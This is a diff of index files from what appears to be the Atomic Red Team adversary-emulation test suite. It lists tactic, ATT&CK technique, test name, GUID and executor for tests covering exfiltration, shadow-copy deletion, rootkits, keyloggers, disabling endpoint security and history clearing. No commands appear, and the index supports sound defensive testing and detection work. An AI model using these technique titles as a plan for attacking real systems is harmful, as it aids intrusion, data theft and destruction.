1370 command-and-control T1105 Ingress Tool Transfer 10 Windows - PowerShell Download 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8 powershell
1371 command-and-control T1105 Ingress Tool Transfer 11 OSTAP Worming Activity 2ca61766-b456-4fcf-a35a-1233685e1cad command_prompt
1372 command-and-control T1105 Ingress Tool Transfer 12 svchost writing a file to a UNC path fa5a2759-41d7-4e13-a19c-e8f28a53566f command_prompt
1373 command-and-control T1105 Ingress Tool Transfer 13 Download a File with Windows Defender MpCmdRun.exe 815bef8b-bf91-4b67-be4c-abe4c2a94ccc command_prompt
1374 command-and-control T1105 Ingress Tool Transfer 14 whois file download c99a829f-0bb8-4187-b2c6-d47d1df74cab sh
1375 command-and-control T1105 Ingress Tool Transfer 15 File Download via PowerShell 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 powershell
1376 command-and-control T1105 Ingress Tool Transfer 16 File download with finger.exe on Windows 5f507e45-8411-4f99-84e7-e38530c45d01 command_prompt
1377 command-and-control T1105 Ingress Tool Transfer 17 Download a file with IMEWDBLD.exe 1a02df58-09af-4064-a765-0babe1a0d1e2 powershell
1378 command-and-control T1105 Ingress Tool Transfer 18 Curl Download File 2b080b99-0deb-4d51-af0f-833d37c4ca6a command_prompt
1379 command-and-control T1105 Ingress Tool Transfer 19 Curl Upload File 635c9a38-6cbf-47dc-8615-3810bc1167cf command_prompt
1380 command-and-control T1105 Ingress Tool Transfer 20 Download a file with Microsoft Connection Manager Auto-Download d239772b-88e2-4a2e-8473-897503401bcc command_prompt
1381 command-and-control T1105 Ingress Tool Transfer 21 MAZE Propagation Script 70f4d07c-5c3e-4d53-bb0a-cdf3ada14baf powershell
1382 command-and-control T1105 Ingress Tool Transfer 22 Printer Migration Command-Line Tool UNC share folder into a zip file 49845fc1-7961-4590-a0f0-3dbcf065ae7e command_prompt
1383 command-and-control T1105 Ingress Tool Transfer 23 Lolbas replace.exe use to copy file 54782d65-12f0-47a5-b4c1-b70ee23de6df command_prompt
1384 command-and-control T1105 Ingress Tool Transfer 24 Lolbas replace.exe use to copy UNC file ed0335ac-0354-400c-8148-f6151d20035a command_prompt
1385 command-and-control T1105 Ingress Tool Transfer 25 certreq download 6fdaae87-c05b-42f8-842e-991a74e8376b command_prompt
1386 command-and-control T1105 Ingress Tool Transfer 26 Download a file using wscript 97116a3f-efac-4b26-8336-b9cb18c45188 command_prompt
1387 command-and-control T1105 Ingress Tool Transfer 27 Linux Download File and Run bdc373c5-e9cf-4563-8a7b-a9ba720a90f3 sh
1388 command-and-control T1105 Ingress Tool Transfer 28 Nimgrab - Transfer Files b1729c57-9384-4d1c-9b99-9b220afb384e command_prompt
1389 command-and-control T1105 Ingress Tool Transfer 29 iwr or Invoke Web-Request download c01cad7f-7a4c-49df-985e-b190dcf6a279 command_prompt
1390 command-and-control T1090.001 Proxy: Internal Proxy 1 Connection Proxy 0ac21132-4485-4212-a681-349e8a6637cd sh
1391 command-and-control T1090.001 Proxy: Internal Proxy 2 Connection Proxy for macOS UI 648d68c1-8bcd-4486-9abe-71c6655b6a2c sh
1392 command-and-control T1090.001 Proxy: Internal Proxy 3 portproxy reg key b8223ea9-4be2-44a6-b50a-9657a3d4e72a powershell
1393 reconnaissance T1592.001 Gather Victim Host Information: Hardware 1 Enumerate PlugNPlay Camera d430bf85-b656-40e7-b238-42db01df0183 powershell
1394 impact T1489 Service Stop 1 Windows - Stop service using Service Controller 21dfb440-830d-4c86-a3e5-2a491d5a8d04 command_prompt
1395 impact T1489 Service Stop 2 Windows - Stop service using net.exe 41274289-ec9c-4213-bea4-e43c4aa57954 command_prompt
1396 impact T1489 Service Stop 3 Windows - Stop service by killing process f3191b84-c38b-400b-867e-3a217a27795f command_prompt
1397 impact T1491.001 Defacement: Internal Defacement 1 Replace Desktop Wallpaper 30558d53-9d76-41c4-9267-a7bd5184bed3 powershell
1398 impact T1491.001 Defacement: Internal Defacement 2 Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message ffcbfaab-c9ff-470b-928c-f086b326089b powershell
1399 impact T1531 Account Access Removal 1 Change User Password - Windows 1b99ef28-f83c-4ec5-8a08-1a56263a5bb2 command_prompt
1400 impact T1531 Account Access Removal 2 Delete User - Windows f21a1d7d-a62f-442a-8c3a-2440d43b19e5 command_prompt
1401 impact T1531 Account Access Removal 3 Remove Account From Domain Admin Group 43f71395-6c37-498e-ab17-897d814a0947 powershell
1402 impact T1486 Data Encrypted for Impact 1 Encrypt files using gpg (Linux) 7b8ce084-3922-4618-8d22-95f996173765 bash
1403 impact T1486 Data Encrypted for Impact 2 Encrypt files using 7z (Linux) 53e6735a-4727-44cc-b35b-237682a151ad bash
1404 impact T1486 Data Encrypted for Impact 3 Encrypt files using ccrypt (Linux) 08cbf59f-85da-4369-a5f4-049cffd7709f bash
1405 impact T1486 Data Encrypted for Impact 4 Encrypt files using openssl (Linux) 142752dc-ca71-443b-9359-cf6f497315f1 bash
1406 impact T1486 Data Encrypted for Impact 5 PureLocker Ransom Note 649349c7-9abf-493b-a7a2-b1aa4d141528 command_prompt
1407 impact T1496 Resource Hijacking 1 macOS/Linux - Simulate CPU Load with Yes 904a5a0e-fb02-490d-9f8d-0e256eb37549 bash
1408 impact T1485 Data Destruction 1 Windows - Overwrite file with Sysinternals SDelete 476419b5-aebf-4366-a131-ae3e8dae5fc2 powershell
1409 impact T1485 Data Destruction 2 macOS/Linux - Overwrite file with DD 38deee99-fd65-4031-bec8-bfa4f9f26146 bash
1410 impact T1485 Data Destruction 3 Overwrite deleted data on C drive 321fd25e-0007-417f-adec-33232252be19 command_prompt
1411 impact T1490 Inhibit System Recovery 1 Windows - Delete Volume Shadow Copies 43819286-91a9-4369-90ed-d31fb4da2c01 command_prompt
1412 impact T1490 Inhibit System Recovery 2 Windows - Delete Volume Shadow Copies via WMI 6a3ff8dd-f49c-4272-a658-11c2fe58bd88 command_prompt
1413 impact T1490 Inhibit System Recovery 3 Windows - wbadmin Delete Windows Backup Catalog 263ba6cb-ea2b-41c9-9d4e-b652dadd002c command_prompt
1414 impact T1490 Inhibit System Recovery 4 Windows - Disable Windows Recovery Console Repair cf21060a-80b3-4238-a595-22525de4ab81 command_prompt
1415 impact T1490 Inhibit System Recovery 5 Windows - Delete Volume Shadow Copies via WMI with PowerShell 39a295ca-7059-4a88-86f6-09556c1211e7 powershell
1416 impact T1490 Inhibit System Recovery 6 Windows - Delete Backup Files 6b1dbaf6-cc8a-4ea6-891f-6058569653bf command_prompt
1417 impact T1490 Inhibit System Recovery 7 Windows - wbadmin Delete systemstatebackup 584331dd-75bc-4c02-9e0b-17f5fd81c748 command_prompt
1418 impact T1490 Inhibit System Recovery 8 Windows - Disable the SR scheduled task 1c68c68d-83a4-4981-974e-8993055fa034 command_prompt
1419 impact T1490 Inhibit System Recovery 9 Disable System Restore Through Registry 66e647d1-8741-4e43-b7c1-334760c2047f command_prompt
1420 impact T1529 System Shutdown/Reboot 1 Shutdown System - Windows ad254fa8-45c0-403b-8c77-e00b3d3e7a64 command_prompt
1421 impact T1529 System Shutdown/Reboot 2 Restart System - Windows f4648f0d-bf78-483c-bafc-3ec99cd1c302 command_prompt
1422 impact T1529 System Shutdown/Reboot 3 Restart System via `shutdown` - macOS/Linux 6326dbc4-444b-4c04-88f4-27e94d0327cb bash
1423 impact T1529 System Shutdown/Reboot 4 Shutdown System via `shutdown` - macOS/Linux 4963a81e-a3ad-4f02-adda-812343b351de bash
1424 impact T1529 System Shutdown/Reboot 5 Restart System via `reboot` - macOS/Linux 47d0b042-a918-40ab-8cf9-150ffe919027 bash
1425 impact T1529 System Shutdown/Reboot 6 Shutdown System via `halt` - Linux 918f70ab-e1ef-49ff-bc57-b27021df84dd bash
1426 impact T1529 System Shutdown/Reboot 7 Reboot System via `halt` - Linux 78f92e14-f1e9-4446-b3e9-f1b921f2459e bash
1427 impact T1529 System Shutdown/Reboot 8 Shutdown System via `poweroff` - Linux 73a90cd2-48a2-4ac5-8594-2af35fa909fa bash
1428 impact T1529 System Shutdown/Reboot 9 Reboot System via `poweroff` - Linux 61303105-ff60-427b-999e-efb90b314e41 bash
1429 impact T1529 System Shutdown/Reboot 10 Logoff System - Windows 3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4 command_prompt
1430 initial-access T1133 External Remote Services 1 Running Chrome VPN Extensions via the Registry 2 vpn extension 4c8db261-a58b-42a6-a866-0a294deedde4 powershell
1431 initial-access T1566.001 Phishing: Spearphishing Attachment 1 Download Macro-Enabled Phishing Attachment 114ccff9-ae6d-4547-9ead-4cd69f687306 powershell
1432 initial-access T1566.001 Phishing: Spearphishing Attachment 2 Word spawned a command shell and used an IP address in the command line cbb6799a-425c-4f83-9194-5447a909d67f powershell
1433 initial-access T1091 Replication Through Removable Media 1 USB Malware Spread Simulation d44b7297-622c-4be8-ad88-ec40d7563c75 powershell
1434 initial-access T1195 Supply Chain Compromise 1 Octopus Scanner Malware Open Source Supply Chain 82a9f001-94c5-495e-9ed5-f530dbded5e2 command_prompt
1435 initial-access T1078.001 Valid Accounts: Default Accounts 1 Enable Guest account with RDP capability and admin privileges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
1436 initial-access T1078.001 Valid Accounts: Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
1437 initial-access T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
1438 initial-access T1078.003 Valid Accounts: Local Accounts 1 Create local account with admin privileges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
1439 initial-access T1078.003 Valid Accounts: Local Accounts 2 Create local account with admin privileges - MacOS f1275566-1c26-4b66-83e3-7f9f7f964daa bash
1440 initial-access T1078.003 Valid Accounts: Local Accounts 3 WinPwn - Loot local Credentials - powerhell kittie 9e9fd066-453d-442f-88c1-ad7911d32912 powershell
1441 initial-access T1078.003 Valid Accounts: Local Accounts 4 WinPwn - Loot local Credentials - Safetykatz e9fdb899-a980-4ba4-934b-486ad22e22f4 powershell
1442 exfiltration T1567 Exfiltration Over Web Service 1 Data Exfiltration with ConfigSecurityPolicy 5568a8f4-a8b1-4c40-9399-4969b642f122 powershell
1443 exfiltration T1020 Automated Exfiltration 1 IcedID Botnet HTTP PUT 9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0 powershell
1444 exfiltration T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol 1 Exfiltrate data HTTPS using curl windows 1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0 command_prompt
1445 exfiltration T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol 2 Exfiltrate data HTTPS using curl linux 4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01 bash
1446 exfiltration T1041 Exfiltration Over C2 Channel 1 C2 Data Exfiltration d1253f6e-c29b-49dc-b466-2147a6191932 powershell
1447 exfiltration T1048 Exfiltration Over Alternative Protocol 1 Exfiltration Over Alternative Protocol - SSH f6786cc8-beda-4915-a4d6-ac2f193bb988 sh
1448 exfiltration T1048 Exfiltration Over Alternative Protocol 2 Exfiltration Over Alternative Protocol - SSH 7c3cb337-35ae-4d06-bf03-3032ed2ec268 sh
1449 exfiltration T1048 Exfiltration Over Alternative Protocol 3 DNSExfiltration (doh) c943d285-ada3-45ca-b3aa-7cd6500c6a48 powershell
1450 exfiltration T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage 1 Exfiltrate data with rclone to cloud Storage - Mega (Windows) 8529ee44-279a-4a19-80bf-b846a40dda58 powershell
1451 exfiltration T1030 Data Transfer Size Limits 1 Data Transfer Size Limits ab936c51-10f4-46ce-9144-e02137b2016a sh
1452 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 1 Exfiltration Over Alternative Protocol - HTTP 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff manual
1453 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 2 Exfiltration Over Alternative Protocol - ICMP dd4b4421-2e25-4593-90ae-7021947ad12e powershell
1454 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 3 Exfiltration Over Alternative Protocol - DNS c403b5a4-b5fc-49f2-b181-d1c80d27db45 manual
1455 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 4 Exfiltration Over Alternative Protocol - HTTP 6aa58451-1121-4490-a8e9-1dada3f1c68c powershell
1456 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 5 Exfiltration Over Alternative Protocol - SMTP ec3a835e-adca-4c7c-88d2-853b69c11bb9 powershell
1457 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 6 MAZE FTP Upload 57799bc2-ad1e-4130-a793-fb0c385130ba powershell
1458 exfiltration T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 7 Exfiltration Over Alternative Protocol - FTP - Rclone b854eb97-bf9b-45ab-a1b5-b94e4880c56b powershell
atomics/Indexes/Indexes-CSV/linux-index.csv
-268
View File
@@ -1,268 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,1,chmod - Change file or folder mode (numeric mode),34ca1464-de9d-40c6-8c77-690adf36a135,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,2,chmod - Change file or folder mode (symbolic mode),fc9d6695-d022-4a80-91b1-381f5c35aff3,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,3,chmod - Change file or folder mode (numeric mode) recursively,ea79f937-4a4d-4348-ace6-9916aec453a4,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,4,chmod - Change file or folder mode (symbolic mode) recursively,0451125c-b5f6-488f-993b-5a32b09f7d8f,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,5,chown - Change file or folder ownership and group,d169e71b-85f9-44ec-8343-27093ff3dfc0,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,6,chown - Change file or folder ownership and group recursively,b78598be-ff39-448f-a463-adbf2a5b7848,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,10,Chmod through c script,973631cf-6680-4ffa-a053-045e1b6b67ab,sh
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,11,Chown through c script,18592ba1-5f88-4e3c-abc8-ab1c6042e389,sh
defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh
defense-evasion,T1014,Rootkit,3,dynamic-linker based rootkit (libprocesshider),1338bf0c-fd0c-48c0-9e65-329f18e2c0d3,sh
defense-evasion,T1014,Rootkit,4,Loadable Kernel Module based Rootkit (Diamorphine),0b996469-48c6-46e2-8155-a17f8b6c2247,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,2,Overwrite Linux Mail Spool,1602ff76-ed7f-4c94-b550-2f727b4782d4,bash
defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,3,Overwrite Linux Log,d304b2dc-90b4-4465-a650-16ddd503f7b5,bash
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,4,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,5,Clear Bash history (truncate),47966a1d-df4f-4078-af65-db6d9aa20739,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,6,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,7,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,8,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,9,Disable Bash History Logging with SSH -T,5f8abd62-f615-43c5-b6be-f780f25790a1,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,3,Base64 decoding with Python,356dc0e8-684f-4428-bb94-9313998ad608,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,4,Base64 decoding with Perl,6604d964-b9f6-4d4b-8ce8-499829a14d0a,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding with shell utilities,b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,6,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,1,Set a file's access timestamp,5f9113d5-ed75-47ed-ba23-ea3573d05810,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,2,Set a file's modification timestamp,20ef1523-8758-4898-b5a2-d026cc3d2c52,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,4,Modify file timestamps using reference file,631ea661-d661-44b0-abdb-7a7f3fc08e50,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,7,Stop/Start UFW firewall,fe135572-edcd-49a2-afe6-1d39521c5a9a,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,8,Stop/Start UFW firewall systemctl,9fd99609-1854-4f3c-b47b-97d9a5972bd1,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,9,Turn off UFW logging,8a95b832-2c2a-494d-9cb0-dc9dd97c8bad,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,10,Add and delete UFW firewall rules,b2563a4e-c4b8-429c-8d47-d5bcb227ba7a,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,11,Edit UFW firewall user.rules file,beaf815a-c883-4194-97e9-fdbbb2bbdd7c,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,12,Edit UFW firewall ufw.conf file,c1d8c4eb-88da-4927-ae97-c7c25893803b,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,13,Edit UFW firewall sysctl.conf file,c4ae0701-88d3-4cd8-8bce-4801ed9f97e4,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,14,Edit UFW firewall main configuration file,7b697ece-8270-46b5-bbc7-6b9e27081831,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,15,Tail the UFW firewall log file,419cca0c-fa52-4572-b0d7-bc7c6f388a27,sh
defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,4,Make and modify capabilities of a binary,db53959c-207d-4000-9e7a-cd8eb417e072,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,5,Provide the SetUID capability to a file,1ac3272f-9bcf-443a-9888-4b1d3de785c1,sh
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,1,Auditing Configuration Changes on Linux Host,212cfbcf-4770-4980-bc21-303e37abd0e3,bash
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,2,Logging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,1,Disable syslog,4ce786f8-e601-44b5-bfae-9ebb15a7d1c8,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,2,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,3,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,4,Stop Crowdstrike Falcon on Linux,828a1278-81cc-4802-96ab-188bf29ca77d,sh
defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
defense-evasion,T1036.003,Masquerading: Rename System Utilities,2,Masquerading as Linux crond process.,a315bfff-7a98-403b-b442-2ea1b255e556,sh
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,2,Install root CA on Debian/Ubuntu,53bcf8a0-1549-4b85-b919-010c56d724ff,sh
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,3,C compile,d0377aa6-850a-42b2-95f0-de558d80be57,bash
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,4,CC compile,da97bb11-d6d0-4fc1-b445-e443d1346efe,bash
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,5,Go compile,78bd3fa7-773c-449e-a978-dc1f1500bc52,bash
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f10-4485-ad26-abf22a764c52,bash
defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,1,Binary simply packed by UPX (linux),11c46cd8-e471-450e-acb8-52a1216ae6a4,sh
defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,2,"Binary packed by UPX, with modified headers (linux)",f06197f8-ff46-48c2-a0c6-afc1b50665e1,sh
defense-evasion,T1036.006,Masquerading: Space after Filename,2,Space After Filename,b95ce2eb-a093-4cd8-938d-5258cef656ea,bash
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,1,Create a hidden file in a hidden directory,61a782e5-9a19-40b5-8ba4-69a4b9f3d7be,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash
collection,T1056.001,Input Capture: Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
collection,T1056.001,Input Capture: Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
collection,T1056.001,Input Capture: Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh
collection,T1056.001,Input Capture: Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
collection,T1056.001,Input Capture: Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
collection,T1074.001,Data Staged: Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
collection,T1115,Clipboard Data,5,Add or copy content to clipboard with xClip,ee363e53-b083-4230-aff3-f8d955f2d5bb,sh
collection,T1560.002,Archive Collected Data: Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash
collection,T1560.002,Archive Collected Data: Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash
collection,T1560.002,Archive Collected Data: Archive via Library,3,Compressing data using zipfile in Python (Linux),001a042b-859f-44d9-bf81-fd1c4e2200b0,bash
collection,T1560.002,Archive Collected Data: Archive via Library,4,Compressing data using tarfile in Python (Linux),e86f1b4b-fcc1-4a2a-ae10-b49da01458db,bash
persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
persistence,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
persistence,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
persistence,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
